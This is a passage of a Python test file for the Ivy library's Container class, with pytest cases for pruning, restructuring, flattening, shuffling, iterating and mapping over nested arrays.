container = Container(dict_in)
container_pruned = container.prune_keys(['a', 'c'])
assert 'a' not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert 'c' not in container_pruned['b']
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
def _test_bd_exception(container_in):
try:
_ = container_in.b.d
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
container_pruned = container.prune_keys(['a', 'd'])
assert 'a' not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.c), np.array([[2]]))
assert 'd' not in container_pruned['b']
assert _test_a_exception(container_pruned)
assert _test_bd_exception(container_pruned)
def test_container_prune_key_chain(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': None}}
container = Container(dict_in)
container_pruned = container.prune_key_chain('b/c')
assert np.allclose(ivy.to_numpy(container_pruned['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert (container_pruned['b']['d'] is None)
assert (container_pruned.b.d is None)
assert ('c' not in container_pruned['b'].keys())
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
container_pruned = container.prune_key_chain('b')
assert np.allclose(ivy.to_numpy(container_pruned['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert ('b' not in container_pruned.keys())
def _test_exception(container_in):
try:
_ = container_in.b
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
def test_container_prune_key_chains(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_pruned = container.prune_key_chains(['a', 'b/c'])
assert 'a' not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert 'c' not in container_pruned['b']
def _test_a_exception(container_in):
try:
_ = container_in.a
return False
except AttributeError:
return True
def _test_bc_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
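    # the chains to prune can equivalently be specified as a nested Container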
container_pruned = container.prune_key_chains(Container({'a': True, 'b': {'c': True}}))
assert 'a' not in container_pruned
assert np.allclose(ivy.to_numpy(container_pruned['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert 'c' not in container_pruned['b']
assert _test_a_exception(container_pruned)
assert _test_bc_exception(container_pruned)
def test_container_format_key_chains(dev, call):
dict_in = {'_a': ivy.array([1], dev=dev),
'b ': {'c': ivy.array([2], dev=dev), 'd-': ivy.array([3], dev=dev)}}
cont = Container(dict_in)
cont_formatted = cont.format_key_chains(lambda s: s.replace('_', '').replace(' ', '').replace('-', ''))
assert np.allclose(ivy.to_numpy(cont_formatted['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted.a), np.array([1]))
assert np.allclose(ivy.to_numpy(cont_formatted['b']['c']), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.c), np.array([2]))
assert np.allclose(ivy.to_numpy(cont_formatted['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(cont_formatted.b.d), np.array([3]))
def test_container_sort_by_key(dev, call):
dict_in = {'b': ivy.array([1], dev=dev),
'a': {'d': ivy.array([2], dev=dev), 'c': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_sorted = container.sort_by_key()
for k, k_true in zip(container_sorted.keys(), ['a', 'b']):
assert k == k_true
for k, k_true in zip(container_sorted.a.keys(), ['c', 'd']):
assert k == k_true
def test_container_prune_empty(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': {}, 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_pruned = container.prune_empty()
assert np.allclose(ivy.to_numpy(container_pruned['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.b.d), np.array([[3]]))
assert ('c' not in container_pruned['b'])
def _test_exception(container_in):
try:
_ = container_in.b.c
return False
except AttributeError:
return True
assert _test_exception(container_pruned)
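
# prune_key_from_key_chains drops a matching key at any nesting level and promotes its
# children to the parent level (so 'Bee/Cee' becomes a top-level 'Cee' below);
# the 'containing' argument matches keys by substring instead of exact name.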
def test_container_prune_key_from_key_chains(dev, call):
container = Container({'Ayy': ivy.array([1], dev=dev),
'Bee': {'Cee': ivy.array([2], dev=dev), 'Dee': ivy.array([3], dev=dev)},
'Beh': {'Ceh': ivy.array([4], dev=dev), 'Deh': ivy.array([5], dev=dev)}})
# absolute
container_pruned = container.prune_key_from_key_chains('Bee')
assert np.allclose(ivy.to_numpy(container_pruned['Ayy']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['Cee']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned['Dee']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert ('Bee' not in container_pruned)
# containing
container_pruned = container.prune_key_from_key_chains(containing='B')
assert np.allclose(ivy.to_numpy(container_pruned['Ayy']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['Cee']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned['Dee']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned['Ceh']), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ceh), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned['Deh']), np.array([[5]]))
assert np.allclose(ivy.to_numpy(container_pruned.Deh), np.array([[5]]))
assert ('Bee' not in container_pruned)
assert ('Beh' not in container_pruned)
def test_container_prune_keys_from_key_chains(dev, call):
container = Container({'Ayy': ivy.array([1], dev=dev),
'Bee': {'Cee': ivy.array([2], dev=dev), 'Dee': ivy.array([3], dev=dev)},
'Eee': {'Fff': ivy.array([4], dev=dev)}})
# absolute
container_pruned = container.prune_keys_from_key_chains(['Bee', 'Eee'])
assert np.allclose(ivy.to_numpy(container_pruned['Ayy']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['Cee']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned['Dee']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned['Fff']), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert ('Bee' not in container_pruned)
assert ('Eee' not in container_pruned)
# containing
container_pruned = container.prune_keys_from_key_chains(containing=['B', 'E'])
assert np.allclose(ivy.to_numpy(container_pruned['Ayy']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned.Ayy), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_pruned['Cee']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned.Cee), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_pruned['Dee']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned.Dee), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_pruned['Fff']), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_pruned.Fff), np.array([[4]]))
assert ('Bee' not in container_pruned)
assert ('Eee' not in container_pruned)
def test_container_restructure_key_chains(dev, call):
# single
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_restructured = container.restructure_key_chains({'a': 'A'})
assert np.allclose(ivy.to_numpy(container_restructured['A']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured['b/c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured['b/d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.b.d), np.array([[3]]))
# full
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_restructured = container.restructure_key_chains({'a': 'A', 'b/c': 'B/C', 'b/d': 'B/D'})
assert np.allclose(ivy.to_numpy(container_restructured['A']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_restructured['B/C']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_restructured['B/D']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_restructured.B.D), np.array([[3]]))
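
# restructure both remaps key chains and reshapes each array according to a
# rearrange-style pattern string such as 'a b -> (a b)'; axes_lengths supplies any
# axis sizes that cannot be inferred, and keep_orig=False drops the original entries.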
def test_container_restructure(dev, call):
container = Container({'a': ivy.array([[1, 2], [3, 4]], dev=dev),
'b': {'c': ivy.array([[2, 4], [6, 8]], dev=dev),
'd': ivy.array([3, 6, 9, 12], dev=dev)}})
container_restructured = container.restructure({'a': {'key_chain': 'A', 'pattern': 'a b -> b a'},
'b/c': {'key_chain': 'B/C', 'pattern': 'a b -> (a b)'},
'b/d': {'key_chain': 'B/D', 'pattern': '(a b) -> a b',
'axes_lengths': {'a': 2, 'b': 2}}}, keep_orig=False)
assert np.allclose(ivy.to_numpy(container_restructured['A']), np.array([[1, 3], [2, 4]]))
assert np.allclose(ivy.to_numpy(container_restructured.A), np.array([[1, 3], [2, 4]]))
assert np.allclose(ivy.to_numpy(container_restructured['B/C']), np.array([2, 4, 6, 8]))
assert np.allclose(ivy.to_numpy(container_restructured.B.C), np.array([2, 4, 6, 8]))
    assert np.allclose(ivy.to_numpy(container_restructured['B/D']), np.array([[3, 6], [9, 12]]))
    assert np.allclose(ivy.to_numpy(container_restructured.B.D), np.array([[3, 6], [9, 12]]))
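
# flatten_key_chains joins nested keys with '__'; above_height leaves the lowest
# level(s) nested, while below_depth leaves the topmost level(s) nested.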
def test_container_flatten_key_chains(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': {'d': ivy.array([2], dev=dev)},
'e': {'f': {'g': ivy.array([3], dev=dev)}}}})
# full
container_flat = container.flatten_key_chains()
assert np.allclose(ivy.to_numpy(container_flat['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat['b__c__d']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat['b__e__f__g']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f__g), np.array([[3]]))
# above height 1
container_flat = container.flatten_key_chains(above_height=1)
assert np.allclose(ivy.to_numpy(container_flat['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat['b__c']['d']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b__c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat['b__e__f']['g']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b__e__f.g), np.array([[3]]))
# below depth 1
container_flat = container.flatten_key_chains(below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat['b']['c__d']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c__d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat['b']['e__f__g']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f__g), np.array([[3]]))
# above height 1, below depth 1
container_flat = container.flatten_key_chains(above_height=1, below_depth=1)
assert np.allclose(ivy.to_numpy(container_flat['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_flat['b']['c']['d']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat.b.c.d), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_flat['b']['e__f']['g']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_flat.b.e__f.g), np.array([[3]]))
def test_container_deep_copy(dev, call):
dict_in = {'a': ivy.array([0.], dev=dev),
'b': {'c': ivy.array([1.], dev=dev), 'd': ivy.array([2.], dev=dev)}}
cont = Container(dict_in)
cont_deepcopy = cont.deep_copy()
assert np.allclose(ivy.to_numpy(cont.a), ivy.to_numpy(cont_deepcopy.a))
assert np.allclose(ivy.to_numpy(cont.b.c), ivy.to_numpy(cont_deepcopy.b.c))
assert np.allclose(ivy.to_numpy(cont.b.d), ivy.to_numpy(cont_deepcopy.b.d))
assert id(cont.a) != id(cont_deepcopy.a)
assert id(cont.b.c) != id(cont_deepcopy.b.c)
assert id(cont.b.d) != id(cont_deepcopy.b.d)
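
# __contains__ accepts both '/'-delimited key chains and whole sub-containers;
# contains_sub_container requires the same leaf entries, whereas contains_sub_structure
# only requires matching keys and array shapes, and partial=True allows subsets.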
def test_container_contains(dev, call):
arr0 = ivy.array([0.], dev=dev)
arr1 = ivy.array([1.], dev=dev)
arr2 = ivy.array([2.], dev=dev)
sub_cont = Container({'c': arr1, 'd': arr2})
container = Container({'a': arr0, 'b': sub_cont})
# keys
assert 'a' in container
assert 'b' in container
assert 'c' not in container
assert 'b/c' in container
assert 'd' not in container
assert 'b/d' in container
# sub-container
assert container.contains_sub_container(container)
assert container.contains_sub_container(sub_cont)
assert sub_cont in container
# partial sub-container
partial_sub_cont = Container({'b': {'d': arr2}})
assert container.contains_sub_container(container, partial=True)
assert container.contains_sub_container(partial_sub_cont, partial=True)
assert not partial_sub_cont.contains_sub_container(container, partial=True)
# sub-structure
sub_struc = Container({'c': ivy.array([3.], dev=dev), 'd': ivy.array([4.], dev=dev)})
assert not container.contains_sub_container(sub_struc)
assert sub_struc not in container
assert container.contains_sub_structure(sub_struc)
assert container.contains_sub_structure(container)
# partial sub-structure
partial_sub_struc = Container({'b': {'d': ivy.array([4.], dev=dev)}})
assert container.contains_sub_structure(container, partial=True)
assert container.contains_sub_structure(partial_sub_struc, partial=True)
assert not partial_sub_struc.contains_sub_structure(container, partial=True)
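
# shuffle(seed) applies the same seeded permutation to every leaf array, keeping the
# entries aligned across the container; key_chains, to_apply, prune_unapplied and
# map_sequences control which leaves are shuffled, pruned or recursed into.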
def test_container_shuffle(dev, call):
if call is helpers.tf_graph_call:
        # tf.random.set_seed is not captured by graph compilation, so the shuffles would not be aligned between container items.
pytest.skip()
dict_in = {'a': ivy.array([1, 2, 3], dev=dev),
'b': {'c': ivy.array([1, 2, 3], dev=dev), 'd': ivy.array([1, 2, 3], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_shuffled = container.shuffle(0)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['d']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.d) == shuffled_data).all()
# with key_chains to apply
container_shuffled = container.shuffle(0, ['a', 'b/c'])
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['d']) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to apply pruned
container_shuffled = container.shuffle(0, ['a', 'b/c'], prune_unapplied=True)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert 'b/d' not in container_shuffled
    # with key_chains to not apply
container_shuffled = container.shuffle(0, Container({'a': None, 'b': {'d': None}}), to_apply=False)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.a) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b']['d']) == ivy.to_numpy(data)).all()
assert (ivy.to_numpy(container_shuffled.b.d) == ivy.to_numpy(data)).all()
# with key_chains to not apply pruned
container_shuffled = container.shuffle(0, Container({'a': None, 'b': {'d': None}}), to_apply=False,
prune_unapplied=True)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert 'a' not in container_shuffled
assert (ivy.to_numpy(container_shuffled['b']['c']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b.c) == shuffled_data).all()
assert 'b/d' not in container_shuffled
# map sequences
dict_in = {'a': ivy.array([1, 2, 3], dev=dev),
'b': [ivy.array([1, 2, 3], dev=dev), ivy.array([1, 2, 3], dev=dev)]}
container = Container(dict_in)
container_shuffled = container.shuffle(0, map_sequences=True)
data = ivy.array([1, 2, 3], dev=dev)
ivy.functional.ivy.random.seed()
shuffled_data = ivy.to_numpy(ivy.functional.ivy.random.shuffle(data))
assert (ivy.to_numpy(container_shuffled['a']) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.a) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b'][0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[0]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled['b'][1]) == shuffled_data).all()
assert (ivy.to_numpy(container_shuffled.b[1]) == shuffled_data).all()
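
# to_iterator yields (key_chain, value) pairs depth-first; leaf_keys_only shortens the
# chain to the final key, include_empty also yields empty sub-containers, and the
# _values / _keys variants yield only one side of each pair.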
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_to_iterator(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a': a_val, 'b': {'c': bc_val, 'd': bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator(include_empty=include_empty)
for (key_chain, value), expected in zip(container_iterator, [('a', a_val), ('b/c', bc_val), ('b/d', bd_val)]):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
# with leaf keys
container_iterator = container.to_iterator(leaf_keys_only=True, include_empty=include_empty)
for (key_chain, value), expected in zip(container_iterator, [('a', a_val), ('c', bc_val), ('d', bd_val)]):
expected_key_chain = expected[0]
expected_value = expected[1]
assert key_chain == expected_key_chain
assert value is expected_value
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_to_iterator_values(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a': a_val, 'b': {'c': bc_val, 'd': bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_values(include_empty=include_empty)
for value, expected_value in zip(container_iterator, [a_val, bc_val, bd_val]):
assert value is expected_value
@pytest.mark.parametrize(
"include_empty", [True, False])
def test_container_to_iterator_keys(include_empty, dev, call):
a_val = Container() if include_empty else ivy.array([1], dev=dev)
bc_val = Container() if include_empty else ivy.array([2], dev=dev)
bd_val = Container() if include_empty else ivy.array([3], dev=dev)
dict_in = {'a': a_val, 'b': {'c': bc_val, 'd': bd_val}}
container = Container(dict_in)
# with key chains
container_iterator = container.to_iterator_keys(include_empty=include_empty)
for key_chain, expected_key_chain in zip(container_iterator, ['a', 'b/c', 'b/d']):
assert key_chain == expected_key_chain
# with leaf keys
container_iterator = container.to_iterator_keys(leaf_keys_only=True, include_empty=include_empty)
for key, expected_key in zip(container_iterator, ['a', 'c', 'd']):
assert key == expected_key
def test_container_to_flat_list(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_flat_list = container.to_flat_list()
for value, expected_value in zip(container_flat_list,
[ivy.array([1], dev=dev), ivy.array([2], dev=dev),
ivy.array([3], dev=dev)]):
assert value == expected_value
def test_container_from_flat_list(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
flat_list = [4, 5, 6]
container = container.from_flat_list(flat_list)
assert np.allclose(ivy.to_numpy(container['a']), np.array([4]))
assert np.allclose(ivy.to_numpy(container.a), np.array([4]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([5]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([5]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([6]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([6]))
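
# map applies a function to every leaf, optionally restricted to the given key chains;
# to_apply=False inverts the selection, prune_unapplied drops untouched leaves,
# inplace mutates the container itself, and map_sequences descends into list entries.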
@pytest.mark.parametrize(
"inplace", [True, False])
def test_container_map(inplace, dev, call):
# without key_chains specification
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container_orig = Container(dict_in)
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, inplace=inplace)
if inplace:
container_iterator = container.to_iterator()
else:
container_iterator = container_mapped.to_iterator()
for (key, value), expected_value in zip(container_iterator,
[ivy.array([2], dev=dev), ivy.array([3], dev=dev),
ivy.array([4], dev=dev)]):
assert call(lambda x: x, value) == call(lambda x: x, expected_value)
# with key_chains to apply
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, ['a', 'b/c'], inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, ['a', 'b/c'], prune_unapplied=True, inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert 'b/d' not in container_mapped
# with key_chains to not apply
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, Container({'a': None, 'b': {'d': None}}), to_apply=False,
inplace=inplace)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[3]]))
# with key_chains to not apply pruned
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, Container({'a': None, 'b': {'d': None}}), to_apply=False,
prune_unapplied=True, inplace=inplace)
if inplace:
container_mapped = container
if not inplace:
assert 'a' not in container_mapped
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[3]]))
if not inplace:
assert 'b/d' not in container_mapped
# with sequences
container_orig = Container({'a': ivy.array([1], dev=dev),
'b': [ivy.array([2], dev=dev), ivy.array([3], dev=dev)]})
container = container_orig.deep_copy()
container_mapped = container.map(lambda x, _: x + 1, inplace=inplace, map_sequences=True)
if inplace:
container_mapped = container
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([2]))
assert np.allclose(ivy.to_numpy(container_mapped['b'][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_mapped['b'][1]), np.array([4]))
@pytest.mark.parametrize(
"inplace", [True, False])
def test_container_map_conts(inplace, dev, call):
# without key_chains specification
container_orig = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
def _add_e_attr(cont_in):
cont_in.e = ivy.array([4], dev=dev)
return cont_in
# with self
container = container_orig.deep_copy()
container_mapped = container.map_conts(lambda c, _: _add_e_attr(c), inplace=inplace)
if inplace:
container_mapped = container
assert 'e' in container_mapped
assert np.array_equal(ivy.to_numpy(container_mapped.e), np.array([4]))
assert 'e' in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
# without self
container = container_orig.deep_copy()
container_mapped = container.map_conts(lambda c, _: _add_e_attr(c), include_self=False, inplace=inplace)
if inplace:
container_mapped = container
assert 'e' not in container_mapped
assert 'e' in container_mapped.b
assert np.array_equal(ivy.to_numpy(container_mapped.b.e), np.array([4]))
def test_container_multi_map(dev, call):
# without key_chains specification
container0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container1 = Container({'a': ivy.array([3], dev=dev),
'b': {'c': ivy.array([4], dev=dev), 'd': ivy.array([5], dev=dev)}})
    # sum the two containers leaf-wise via multi_map
container_mapped = ivy.Container.multi_map(lambda x, _: x[0] + x[1], [container0, container1])
assert np.allclose(ivy.to_numpy(container_mapped['a']), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped.a), np.array([[4]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['c']), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.c), np.array([[6]]))
assert np.allclose(ivy.to_numpy(container_mapped['b']['d']), np.array([[8]]))
assert np.allclose(ivy.to_numpy(container_mapped.b.d), np.array([[8]]))
def test_container_common_key_chains(dev, call):
arr1 = ivy.array([1], dev=dev)
arr2 = ivy.array([2], dev=dev)
arr3 = ivy.array([3], dev=dev)
cont0 = Container({'a': arr1, 'b': {'c': arr2, 'd': arr3}})
cont1 = Container({'b': {'c': arr2, 'd': arr3, 'e': arr1}})
cont2 = Container({'a': arr1, 'b': {'d': arr3, 'e': arr1}})
# 0
common_kcs = Container.common_key_chains([cont0])
assert len(common_kcs) == 3
assert 'a' in common_kcs
assert 'b/c' in common_kcs
assert 'b/d' in common_kcs
# 0-1
common_kcs = Container.common_key_chains([cont0, cont1])
assert len(common_kcs) == 2
assert 'b/c' in common_kcs
assert 'b/d' in common_kcs
# 0-2
common_kcs = Container.common_key_chains([cont0, cont2])
assert len(common_kcs) == 2
assert 'a' in common_kcs
assert 'b/d' in common_kcs
# 1-2
common_kcs = Container.common_key_chains([cont1, cont2])
assert len(common_kcs) == 2
assert 'b/d' in common_kcs
assert 'b/e' in common_kcs
# all
common_kcs = Container.common_key_chains([cont0, cont1, cont2])
assert len(common_kcs) == 1
assert 'b/d' in common_kcs
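
# identical requires the containers to hold the very same leaf arrays,
# identical_structure only the same key layout, and identical_configs the same
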